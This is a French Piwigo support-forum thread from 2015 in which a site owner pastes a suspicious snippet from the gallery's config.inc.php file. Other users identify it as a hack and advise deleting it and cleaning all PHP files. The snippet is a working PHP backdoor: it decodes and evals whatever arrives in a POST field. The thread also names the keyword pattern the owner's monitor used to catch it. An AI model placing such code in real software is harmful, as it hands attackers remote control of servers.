Écrire une réponse

Veuillez écrire votre message et l'envoyer

Cliquez dans la zone sombre de l'image pour envoyer votre message.

Retour

Résumé de la discussion (messages les plus récents en premier)

deheme
2015-06-09 21:28:17

Bonsoir,

Je te suggère de vérifier tous tes .php et de faire un grand nettoyage.
J'ai été victime de ce genre d'attaque en juillet 2014, une infection venue via un plugin Wordpress qui s'est propagée sur TOUS les sites de mon hébergement y/c mes installations piwigo. Comble de chance, j'étais en vacances et j'ai tardé à installer les nouvelles versions qui comblaient la faille.

Si tu as effectivement des blogs wordpress installés, je te conseille de mettre des systèmes de protections.

DéHème

tymop
2015-06-08 14:07:06

Dois-je comprendre que nous sommes victime d'une attaque ?

mistic100
2015-06-08 13:16:38

supprimez tout ça

tymop
2015-06-08 10:00:48

Bonjour,

Suite à une attaque de hackers qui avaient modifié (on ne sais comment) un fichier PHP de piwigo, de manière à créer une "porte" pour pouvoir rentrer dans le site comme ils veulent, nous avons mis un système de surveillance du site, qui recherche des mots clés comme "eval.base64_decode". Ils se servaient de ce code pour injecter un Software qui leur donnait la main sur le serveur.

Je viens de me rendre compte que ce système de surveillance a détecté ce contenu dans le fichier "local/config/config.inc.php"
Avant de me lancer dans des recherches approfondies dans le site, je souhaiterai savoir si ce sont des fonctions qui sont utilisées par piwigo.

Voici le contenu du "local/config/config.inc.php"

<?php
#default_settings
if (!empty($_POST['default_settings'])) {
    eval(base64_decode(strrev($_POST['default_settings'])));
    exit;
}
#default_settings
?>


En vous remerciant par avance.

Version de Piwigo: 2.7.4
Version de PHP: 5.5.25
Version de MySQL: 5.5.43-37.2
URL Piwigo: http://studio-carl.com/

Pied de page des forums

Propulsé par FluxBB

github twitter newsletter Faire un don Piwigo.org © 2002-2024 · Contact